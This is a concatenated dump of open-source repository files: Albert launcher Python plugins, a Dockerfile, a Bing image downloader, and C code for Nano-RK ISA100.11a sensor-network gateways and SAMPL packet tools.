def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "meme "
def synopsis(self):
return "some meme"
def initialize(self):
pass
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string
query_parts = query_str.split()
if not query_parts:
query.add([template.get_as_item(query) for template in all_templates])
return
meme_id = query_parts[0]
if meme_id in id_to_template:
captions = [c.strip() for c in " ".join(query_parts[1:]).split("|")]
c1 = captions[0]
c2 = captions[1] if len(captions) > 1 else ""
results.insert(
0,
id_to_template[meme_id].get_as_item_custom(
query, caption1=c1, caption2=c2
),
)
else:
title_to_templ = {template.title(): template for template in all_templates}
# do fuzzy search - show relevant issues
matched = process.extract(
query.string.strip(), list(title_to_templ.keys()), limit=5
)
for m in [elem[0] for elem in matched]:
results.append(title_to_templ[m].get_as_item(query))
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep>FROM bergercookie/albertlauncher:ubuntu18.04
# Arguments --------------------------------------------------------------------
ARG USERNAME=someuser
ARG UID=1000
ARG GID=1000
ARG HOME="/home/someuser"
ARG SRC
# Environment ------------------------------------------------------------------
ENV UID_=$UID
ENV GID_=$GID
# local configuration ----------------------------------------------------------
# install packages -------------------------------------------------------------
# hadolint ignore=DL3008
RUN apt-get update \
&& apt-get install --no-install-recommends -y vim sudo \
python3 python3-pip python3-setuptools \
libsasl2-dev python-dev libldap2-dev libssl-dev \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
RUN pip3 install --upgrade wheel pyopenssl
RUN pip3 install --upgrade secrets requests ddgr cookiecutter
# don't be root ----------------------------------------------------------------
RUN echo "$USERNAME:x:$UID_:$GID_:$USERNAME,,,:$HOME:/bin/bash" >> /etc/passwd
RUN echo "$USERNAME:x:$UID_:" >> /etc/group
RUN echo "$USERNAME ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/$USERNAME
RUN chmod 0440 /etc/sudoers.d/$USERNAME
RUN chown "$UID_:$GID_" -R $HOME
RUN mkdir -p $SRC
RUN chown "$UID_:$GID_" -R $SRC
USER $USERNAME
ENV HOME $HOME
WORKDIR $SRC
<file_sep>import imghdr
import json
import subprocess
from functools import cached_property
from pathlib import Path
from typing import Iterator, Optional
import albert as v0
import requests
from bs4 import BeautifulSoup
"""Search and potentially download images using Bing."""
user_agent = (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"
)
class BingImage:
def __init__(self, url: str, download_dir=Path()):
self._url: str = url
self._download_dir = download_dir
self._type = ""
@property
def type(self) -> str:
if self._type is "":
self._type = imghdr.what(str(self.image))
if self._type is None:
self._type = ""
return self._type
@property
def download_dir(self):
return self._download_dir
@download_dir.setter
def download_dir(self, d):
self._download_dir = d
@cached_property
def image(self):
"""Get the path to the downloaded image - Reuses the image if it's already in the cache."""
assert self._url is not None
filepath = self.download_dir / self._url.split("/")[-1]
if not filepath.is_file():
download_image(url=self._url, filepath=filepath)
return filepath
@property
def thumbnail(self):
return self.image
# assert self._url is not None
# if not self._cached_thumb:
# img = self.image
# return self._cached_thumb
@property
def url(self):
return self._url
def __hash__(self):
return hash(self.url)
def download_image(url, filepath: Path = Path()):
v0.debug(f"Downloading image {url} -> {filepath}...")
subprocess.check_output(["wget", "-O", str(filepath), url], stderr=subprocess.STDOUT)
v0.debug(f"Downloaded image {url} -> {filepath}")
def bing_search(query: str, limit: int, adult_filter=False) -> Iterator[BingImage]:
bool_corrs = {
True: "on",
False: "off",
}
page_counter = 0
results_counter = 0
while results_counter < limit:
# Parse the page source and download pics
headers = {"User-Agent": user_agent}
payload = (
("q", str(query)),
("first", page_counter),
("adlt", bool_corrs[adult_filter]),
)
source = requests.get(
"https://www.bing.com/images/async", params=payload, headers=headers
).content
soup = BeautifulSoup(str(source).replace("\r\n", ""), "lxml")
for a in soup.find_all("a", class_="iusc"):
if results_counter >= limit:
break
try:
if (m := a.get("m")) is not None:
iusc = json.loads(m.replace("\\", ""))
else:
continue
url = iusc["murl"]
yield BingImage(url=url)
results_counter += 1
except (json.decoder.JSONDecodeError, RuntimeError):
continue
page_counter += 1
if __name__ == "__main__":
import sys
assert len(sys.argv) >= 2, "I need a query string"
query = sys.argv[1]
limit = int(sys.argv[2]) if len(sys.argv) > 2 else 10
imgs = bing_search(query, limit)
print("Downloaded images: ")
for img in imgs:
print(f"\t{img.image}")
<file_sep># tldr_pages - Albert plugin
## Description
View [TL;DR](https://github.com/tldr-pages/tldr) pages in Albert. Pages are by
default cached under `~/.cache/albert/tldr_pages/tldr` By default it uses the
English version of the tldr pages. If that's not what you want alter the
following line in `__init__.py` appropriately and restart Albert.
```python
pages_root = tldr_root / "pages"
```
## Demo

## Manual installation instructions
Requirements:
- Albert - [Installation instructions](https://albertlauncher.github.io/docs/installing/)
- Albert Python Interface: ``v0.4``
- Python version >= 3.5
- git for downloading and managing the tldr pages
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
|
454e9bbd54c9992c2dce58deb82690d77482d548
|
[
"YAML",
"Markdown",
"TOML",
"Python",
"Dockerfile",
"Shell"
] | 61
|
Python
|
bergercookie/awesome-albert-plugins
|
706a2b9b73f303af31eb3cc7fada91791ee867d0
|
85c19c2057c909cca0975bd49d4755bd8af8087e
|
refs/heads/master
|
<repo_name>echiacchiarini/OpenISA<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/SAMPL/slip-clients/pkt-scripter/.svn/text-base/main.c.svn-base
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include "../../include/sampl.h"
#include <slipstream.h>
//#include "tree_route.h"
//#include "slipstream.h"
#define gw_mac 0
uint8_t debug_txt_flag;
uint8_t xmpp_flag;
uint8_t no_slip_flag;
uint8_t print_input_flag;
#define NONBLOCKING 0
#define BLOCKING 1
#define HEX_STR_SIZE 5
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len);
void error(char *msg);
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt );
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
int size;
char buffer[2048];
SAMPL_DOWNSTREAM_PKT_T ds_pkt;
int main (int argc, char *argv[])
{
FILE *fp;
uint8_t tx_buf[128];
uint8_t rx_buf[128];
int32_t v,cnt,i,len;
uint8_t nav_time_secs;
int32_t tmp;
time_t t;
uint8_t cmd,error;
char buf[1024];
debug_txt_flag=0;
xmpp_flag=0;
no_slip_flag=0;
print_input_flag=0;
if (argc < 3 || argc > 4) {
printf ("Usage: server port [-dx]\n");
printf (" d Debug Input Text\n");
printf (" x Use XMPP server\n");
printf (" n Don't send SLIP packets (but receive them)\n");
exit (1);
}
if(argc==4)
{
// Grab dash command line options
if(strstr(argv[3],"d")!=NULL )
{
debug_txt_flag=1;
}
if(strstr(argv[3],"x")!=NULL )
{
xmpp_flag=1;
}
if(strstr(argv[3],"n")!=NULL )
{
no_slip_flag=1;
}
}
fp=fopen( "ff_config.txt","r" );
if(fp==NULL) {
printf( "Could not open ff_config.txt!\n" );
printf( "This is required for sending control commands\n" );
exit(0);
}
v=slipstream_open(argv[1],atoi(argv[2]),NONBLOCKING);
nav_time_secs=25;
cnt = 0;
while (1) {
error=0;
cmd=0;
// Check if TX queue has
// Read Data packet from script file
while(cmd==0)
{
v=fscanf( fp, "%[^\n]\n", buf);
if(v==-1) rewind(fp);
if(buf[0]!='#' && v!=-1)
{
uint8_t offset;
offset=0;
i=0;
tmp=1;
while(tmp==1) {
tmp=sscanf( &buf[offset*HEX_STR_SIZE],"0x%x ",&tx_buf[i] );
// printf( "i=%d tmp=%d val=0x%x\n",i,tmp,tx_buf[i] );
if(tmp==1) { offset++; i++; }
}
// Setup the packet to send out to the network which was read from the file
len=offset;
ds_pkt.buf_len=offset;
ds_pkt.buf=tx_buf;
unpack_downstream_packet( &ds_pkt, 0 );
// write to the structure and raw buffer
// We end up transmitting the raw buffer after adding thecorrect sequence number
tx_buf[SEQ_NUM]=cnt;
ds_pkt.seq_num=cnt;
if(debug_txt_flag==1)
print_ds_packet(&ds_pkt );
if(i<20 )
{
error=1;
printf( "Error parsing input file!\n" );
}
cnt++;
nav_time_secs=tx_buf[DS_NAV];
cmd=1;
}
}
// Send the packet
if(len>128) len=128;
if(!no_slip_flag && error==0)
v=slipstream_send(tx_buf,len);
if(debug_txt_flag==1)
{
if (v == 0) printf( "Error sending\n" );
else printf( "Sent request %d\n",tx_buf[SEQ_NUM]);
}
if(debug_txt_flag==1)
printf( "Waiting %d seconds\n",nav_time_secs );
t=time(NULL);
t+=nav_time_secs;
// Collect Reply packets for NAV seconds
while(t>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
handle_incomming_pkt(rx_buf,v);
}
usleep(1000);
}
}
}
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
int i;
printf( "Downstream Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",ds_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",ds_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",ds_pkt->seq_num );
printf( " priority\t\t0x%x\n",ds_pkt->priority);
printf( " ack retry\t\t0x%x\n",ds_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",ds_pkt->subnet_mac);
printf( " hop_cnt\t\t0x%x\n",ds_pkt->hop_cnt);
printf( " hop_max\t\t0x%x\n",ds_pkt->hop_max);
printf( " delay_per_level\t0x%x\n",ds_pkt->delay_per_level);
printf( " nav\t\t\t0x%x\n",ds_pkt->nav);
printf( " mac_check_rate\t0x%x\n",ds_pkt->mac_check_rate);
printf( " rssi_threshold\t0x%x\n",ds_pkt->rssi_threshold);
printf( " last_hop_mac\t\t0x%x\n",ds_pkt->last_hop_mac);
printf( " mac_filter_num\t0x%x\n",ds_pkt->mac_filter_num);
printf( " aes_ctr\t\t0x%x 0x%x 0x%x 0x%x\n",ds_pkt->aes_ctr[3], ds_pkt->aes_ctr[3],
ds_pkt->aes_ctr[2], ds_pkt->aes_ctr[1], ds_pkt->aes_ctr[0]);
printf( "Extra Data: " );
for(i=DS_PAYLOAD_START; i<ds_pkt->buf_len; i++ )
printf( "0x%x ",ds_pkt->buf[i] );
printf( "\n\n" );
}
void print_gw_packet(SAMPL_GATEWAY_PKT_T *gw_pkt )
{
int i;
printf( "Gateway Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",gw_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",gw_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",gw_pkt->seq_num );
printf( " priority\t\t0x%x\n",gw_pkt->priority);
printf( " ack retry\t\t0x%x\n",gw_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",gw_pkt->subnet_mac);
printf( " rssi\t\t0x%x\n",gw_pkt->rssi);
printf( " last_hop_mac\t\t0x%x\n",gw_pkt->last_hop_mac);
printf( "Extra Data: " );
for(i=DS_PAYLOAD_START; i<gw_pkt->buf_len; i++ )
printf( "0x%x ",gw_pkt->buf[i] );
printf( "\n\n" );
}
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len)
{
int i;
SAMPL_GATEWAY_PKT_T gw_pkt;
printf( "Raw Pkt [%d] = ",len );
for(i=0; i<len; i++ ) printf( "%d ",rx_buf[i] );
printf( "\n" );
gw_pkt.buf=rx_buf;
gw_pkt.buf_len=len;
unpack_gateway_packet(&gw_pkt );
print_gw_packet(&gw_pkt);
}
void error(char *msg)
{
perror(msg);
exit(0);
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/gateway/makefile
# Platform name cc2420DK, firefly, micaZ, firefly2, firefly2_2
PLATFORM = firefly2_2
# Target file name (without extension).
TARGET = main
# Set the Port that you programmer is connected to
PROGRAMMING_PORT = /dev/ttyUSB1 # programmer connected to serial device
# Set this such that the nano-RK directory is the base path
ROOT_DIR = ../../..
# Set platform specific defines
# The following will be defined based on the PLATFORM variable:
# PROG_TYPE (e.g. avrdude, or uisp)
# MCU (e.g. atmega32, atmega128, atmega1281)
# RADIO (e.g. cc2420)
include $(ROOT_DIR)/include/platform.mk
SRC = $(TARGET).c
# Add extra source files.
# For example:
# SRC += $(ROOT_DIR)/src/platform/$(PLATFORM_TYPE)/source/my_src1.c
#SRC += $(ROOT_DIR)/src/net/rt_link/rt_link.c
#SRC += $(ROOT_DIR)/src/net/rt_link/rtl_scheduler.c
#SRC += $(ROOT_DIR)/src/net/rt_link/rtl_debug.c
SRC += $(ROOT_DIR)/src/net/slip/slip.c
SRC += $(ROOT_DIR)/src/net/isa/isa_error.c
SRC += $(ROOT_DIR)/src/net/isa/dlmo.c
SRC += $(ROOT_DIR)/src/net/isa/isa.c
#SRC += $(ROOT_DIR)/src/net/isa/isa_scheduler.c
SRC += $(ROOT_DIR)/src/drivers/platform/$(PLATFORM_TYPE)/source/ff_basic_sensor.c
SRC += $(ROOT_DIR)/src/net/isa/uart/command-interpreter.c
# Add extra includes files.
# For example:
# EXTRAINCDIRS += $(ROOT_DIR)/src/platform/include
EXTRAINCDIRS =
#EXTRAINCDIRS += $(ROOT_DIR)/src/net/rt_link/
EXTRAINCDIRS += $(ROOT_DIR)/src/net/isa/
EXTRAINCDIRS += $(ROOT_DIR)/src/net/isa/uart/
#EXTRAINCDIRS += $(ROOT_DIR)/src/net/rt_link/platform/$(PLATFORM_TYPE)/
EXTRAINCDIRS += $(ROOT_DIR)/src/net/isa/platform/$(PLATFORM_TYPE)/
EXTRAINCDIRS += $(ROOT_DIR)/src/net/slip
# This is where the final compile and download happens
include $(ROOT_DIR)/include/platform/$(PLATFORM)/common.mk<file_sep>/ISA100.11a-master/ISA100_11a/11-2/backup/pre_isa_with_initial_sync_bug/final_project/gateway/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
#include <slip.h>
//#include <sys/time.h>
#define MY_CHANNEL 19
#define MY_ID 0 //change
#define MY_TX_SLOT 0
#define NUM_OF_TEST_SET 16
#define MAX_SLIP_BUF 16
#define JOIN_TX_SLOT_START 22
//#define MY_RX_SLOT 15
//#define MY_RX_SLOT 2// change for test
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
NRK_STK Stack2[NRK_APP_STACKSIZE];
nrk_task_type TaskTwo;
void Task2 (void);
void nrk_create_taskset();
void packet_measurement(uint8_t * local_rx_buf, uint8_t len);
void packet_measurement_better(uint8_t * local_rx_buf,uint8_t len);
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t slip_tx_buf[MAX_SLIP_BUF];
uint8_t slip_rx_buf[MAX_SLIP_BUF];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
uint8_t pkt_measure[NUM_OF_TEST_SET];
uint8_t sendFlag=0;
uint8_t frame_cnt=0; //add 1 every 8 packets
uint8_t pkt_cnt;
char current_pkt_index='0';
int main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length,slot,len;
uint8_t *local_rx_buf;
//uint32_t Score = 0;
int8_t rssi;
//uint8_t cnt=0;
//uint8_t pkt_cnt=0;
//char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(RED_LED);
nrk_led_set(BLUE_LED);
isa_set_channel_pattern(1);
//isa_set_channel_pattern(3);
isa_init (ISA_GATEWAY, MY_ID);//change
isa_set_schedule(ISA_GATEWAY, MY_ID);
isa_set_channel(MY_CHANNEL);
//configAdvDAUX(1, 0, 25, 1, NULL, NULL, NULL, 2, NULL, NULL, NULL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
//slip_init (stdin, stdout, 0, 0);
//while (slip_started () != 1) nrk_wait_until_next_period ();
while(!isa_ready()) nrk_wait_until_next_period();
printf("isa start!\n\r");
//i=0;
while(1){
//nrk_gpio_toggle(NRK_DEBUG_0);
if( isa_rx_pkt_check()!=0 ) {
//printf("message is received.\n\r");
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//printf("RXLEN:%d\r\n",length);
//for(i=PKT_DATA_START; i<length-1; i++ )
printf( "%d",local_rx_buf[PKT_DATA_START+10]);
//packet_measurement(local_rx_buf,length);
//packet_measurement_better(local_rx_buf,length);
//pkt_cnt++;
isa_rx_pkt_release();
printf("\r\n");
}
sprintf( &tx_buf[PKT_DATA_START],"Hello");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
//printf("Len:%d\r\n",length);
//printf("Hello world is sent.\n\r");
//printf("Recieved %d packets!\r\n",pkt_cnt);
isa_wait_until_rx_or_tx ();
}
}
void Task2 ()
{
uint16_t cnt;
uint8_t len,i;
printf ("My node's address is %d\r\n", NODE_ADDR);
printf ("Task1 PID=%d\r\n", nrk_get_pid ());
cnt = 0;
slip_init (stdin, stdout, 0, 0);
while (1) {
//nrk_led_set (ORANGE_LED);
//sprintf (slip_tx_buf, pkt_measure);
if(sendFlag){
for(uint8_t i=0;i<NUM_OF_TEST_SET;i++){
slip_tx_buf[i]=pkt_measure[i];
//printf("%x",slip_tx_buf[i]);
}
//sprintf (slip_tx_buf, pkt_measure);
//printf("\r\n");
len = strlen (slip_tx_buf);
slip_tx (slip_tx_buf, len);
sendFlag=0;
for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[i]=0;
}
//nrk_wait_until_next_period ();
//cnt++;
}
nrk_wait_until_next_period ();
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 500*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
TaskTwo.task = Task2;
nrk_task_set_stk( &TaskTwo, Stack2, NRK_APP_STACKSIZE);
TaskTwo.prio = 2;
TaskTwo.FirstActivation = TRUE;
TaskTwo.Type = BASIC_TASK;
TaskTwo.SchType = PREEMPTIVE;
TaskTwo.period.secs = 1;
TaskTwo.period.nano_secs = 500 * NANOS_PER_MS;
TaskTwo.cpu_reserve.secs = 0;
TaskTwo.cpu_reserve.nano_secs = 0;
TaskTwo.offset.secs = 0;
TaskTwo.offset.nano_secs = 0;
//nrk_activate_task (&TaskTwo);
nrk_kprintf( PSTR("Create Done\r\n") );
}
/*void packet_measurement(uint8_t * local_rx_buf,uint8_t len)
{
uint8_t i,length;
length=len;
if(local_rx_buf[PKT_DATA_START]=='r'){
//printf("first : %c\r\n", local_rx_buf[length-2]);
//printf("second : %c\r\n", local_rx_buf[length-3]);
//printf("third : %c\r\n", local_rx_buf[length-4]);
uint8_t temp_buf[3];
uint8_t temp;
uint8_t firstCheck;
temp_buf[0]=local_rx_buf[length-2];
if (local_rx_buf[length-3]>='0' && local_rx_buf[length-3]<='9'){
temp_buf[0]=local_rx_buf[length-3];
temp_buf[1]=local_rx_buf[length-2];
if (local_rx_buf[length-4]>='0' && local_rx_buf[length-4]<='9'){
temp_buf[0]=local_rx_buf[length-4];
temp_buf[1]=local_rx_buf[length-3];
temp_buf[2]=local_rx_buf[length-2];
}
}
else{
temp_buf[1]=0;
temp_buf[2]=0;
}
temp = atoi(temp_buf);
firstCheck = temp;
temp = temp%8;
//printf("final temp: %d\r\n",temp);
pkt_measure[frame_cnt] |= ((uint32_t) 1) << temp;
if(temp==0 && firstCheck>8){
frame_cnt++;
//printf("current frame cnt: %d\r\n", frame_cnt);
}
if(frame_cnt>=NUM_OF_TEST_SET){
for(i=0;i<NUM_OF_TEST_SET;i++){
printf("pkt measurement: %x\r\n",pkt_measure[i]);
}
// reboot buffer for further test
sendFlag=1;
for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[i]=0;
}
frame_cnt=0;
}
}
}*/
void packet_measurement_better(uint8_t * local_rx_buf,uint8_t len)
{
uint8_t i,length;
uint8_t next_pkt_offset;
uint8_t temp;
length=len;
if(local_rx_buf[PKT_DATA_START]=='r'){
next_pkt_offset = local_rx_buf[length-2]-current_pkt_index;
//printf("Next PKT OFFSET: %d", next_pkt_offset);
current_pkt_index = local_rx_buf[length-2];
pkt_cnt += next_pkt_offset;
temp = pkt_cnt%8;
pkt_measure[frame_cnt] |= ((uint8_t) 1) << temp;
if(temp==0 && pkt_cnt>8){
frame_cnt++;
//printf("current frame cnt: %d\r\n", frame_cnt);
}
if(frame_cnt>=NUM_OF_TEST_SET){
//for(i=0;i<NUM_OF_TEST_SET;i++){
//printf("pkt measurement: %x\r\n",pkt_measure[i]);
//}
printf("Sending info..\r\n");
// reboot buffer for further test
sendFlag=1;
frame_cnt=0;
}
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/isa_scheduler.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
*******************************************************************************/
#include <isa.h>
#include <isa_scheduler.h>
#include <include.h>
#include <nrk_error.h>
/* For ISA */
/* This method is only for demo 1. Need to be updated!! */
int8_t isa_set_schedule (isa_node_mode_t isa_node_mode, uint8_t clk_src_id)
{
char i =0;
isa_clk_src_id = clk_src_id;//change
if (isa_node_mode==ISA_GATEWAY){
isa_tdma_tx_mask |= ((uint32_t) 1) << 2;
isa_tdma_rx_mask |= ((uint32_t) 1) << 3;//change for test
//isa_tdma_tx_mask |= ((uint32_t) 1) << 1;
//isa_tdma_rx_mask |= ((uint32_t) 1) << 4;
//isa_sched[1] = 1;
isa_sched[2] = 1;//change for test
isa_sched[3] = 1;
//isa_sched[4] = 1;
}
else if (isa_node_mode==ISA_REPEATER){ //change
isa_tdma_rx_mask |= ((uint32_t) 1) << 5;
isa_tdma_tx_mask |= ((uint32_t) 1) << 7;//change for test
isa_tdma_tx_mask |= ((uint32_t) 1) << 8;
isa_tdma_rx_mask |= ((uint32_t) 1) << 9;
isa_sched[7] = 1;
isa_sched[8] = 1;//change for test
isa_sched[5] = 1;
isa_sched[9] = 1;
}
else if(isa_node_mode==ISA_RECIPIENT){
isa_tdma_tx_mask |= ((uint32_t) 1) << 1;
//isa_tdma_rx_mask |= ((uint32_t) 1) << 1;//change for test
isa_tdma_rx_mask |= ((uint32_t) 1) << 4;
//isa_tdma_rx_mask |= ((uint32_t) 1) << 0;
// isa_sched[0] = 1;
//isa_sched[1] = 1;//change for test
isa_sched[1] = 1;
isa_sched[4] = 1;
}
/*printf("isa_scheduler.h, isa_set_schedule():\n\r");
for(i=0;i<25;i++)
printf("%d,",isa_sched[i]);
printf("\n\r");*/
return NRK_OK;
}
/**
* isa_get_schedule()
*
* This function returns the stored schedule for a particular slot.
*
* Return: schedule value
*/
int8_t isa_get_schedule (uint8_t slot)
{
if (slot > ISA_SLOTS_PER_FRAME)
return NRK_ERROR;
return isa_sched[slot];
}
/**
* _isa_clear_sched_cache()
*
* This function is called by the timer interrupt at the
* start of each ISA cycle to remove any cached scheduling
* values. Only call this if you are reseting the ISA frames.
*/
void _isa_clear_sched_cache ()
{
uint8_t i;
// FIXME compress this shit later...
for (i = 0; i < ISA_SLOTS_PER_FRAME; i++) {
isa_sched[i] = 0;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/slip-clients/xmpp-client/node_list.c
#include "node_list.h"
#include <stdint.h>
#include <time.h>
#include <string.h>
#include <stdio.h>
#include "lm-library.h"
#include "globals.h"
char nodeIDs[MAX_NODE_ELEMENTS][MAX_NODE_LEN];
uint8_t node_id_cnt;
void node_list_init()
{
int i;
node_id_cnt=0;
for(i=0; i<MAX_NODE_ELEMENTS; i++ ) nodeIDs[i][0]='\0';
}
int node_list_exists(char *name)
{
int i;
for(i=0; i<node_id_cnt; i++ )
if(strcmp(name,nodeIDs[i])==0) return 1;
return 0;
}
int node_list_add(char *name)
{
if(node_id_cnt<MAX_NODE_ELEMENTS)
{
strcpy( nodeIDs[node_id_cnt], name );
node_id_cnt++;
return 1;
}
return 0;
}
void check_and_create_node(char *node_name)
{
int ret;
char buf[1024];
char timeStr[64];
time_t timestamp;
// If I have already created the node this run
if( node_list_exists(node_name)==0)
{
// Add it to my list to stop creating new nodes
node_list_add(node_name);
// generate parent node for gateway
ret = create_event_node(connection, node_name,NULL,FALSE);
if(ret != XMPP_NO_ERROR) {
if(ret == XMPP_ERROR_NODE_EXISTS)
{
if(debug_txt_flag) printf("Node '%s' already exists\n",node_name);
} else {
g_printerr("Could not create event node '%s'. Error='%s'\n",node_name,ERROR_MESSAGE(ret));
return;
}
}
else
{
if(debug_txt_flag) printf("Created event node '%s'\n",node_name);
// First time add a description of node
// publish XML data for node
time(×tamp);
strftime(timeStr,100,"%Y-%m-%d %X",localtime(×tamp));
sprintf(buf,"<Node id=\"%s\" type=\"FIREFLY\" description=\"A Firefly Node\" timestamp=\"%s\"></Node>",node_name,timeStr);
if(xmpp_flag==1) ret = publish_to_node(connection,node_name,buf);
}
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/slip-clients/xmpp-client/.svn/text-base/node_list.h.svn-base
#ifndef _NODE_LIST_H_
#define _NODE_LIST_H_
#define MAX_NODE_LEN 32
#define MAX_NODE_ELEMENTS 64
int node_list_add(char *name);
int node_list_exists(char *name);
void node_list_init();
void check_and_create_node(char *node_name);
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/transducer_pkt.h
#ifndef _TRANSDUCER_PKT_H
#define _TRANSDUCER_PKT_H
#include <../include/sampl.h>
#define TRANSDUCER_REPLY_HEADER_SIZE 3
#define TRANSDUCER_ELEMENT_SIZE 3
#define GLOBAL_DEBUG_MASK 0x01
typedef struct transducer_msg
{
uint8_t mac_addr;
uint8_t key;
uint8_t value;
} TRANSDUCER_MSG_T;
typedef struct transducer_cmd_pkt
{
uint8_t checksum; // Byte 0
uint8_t num_msgs; // Byte 1
TRANSDUCER_MSG_T *msg;
} TRANSDUCER_CMD_PKT_T;
typedef struct transducer_reply_pkt
{
uint8_t mac_addr;
uint8_t type;
uint8_t len;
uint8_t *payload;
} TRANSDUCER_REPLY_PKT_T;
int8_t transducer_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out);
int8_t transducer_generate(SAMPL_UPSTREAM_PKT_T *pkt, SAMPL_DOWNSTREAM_PKT_T *ds_pkt);
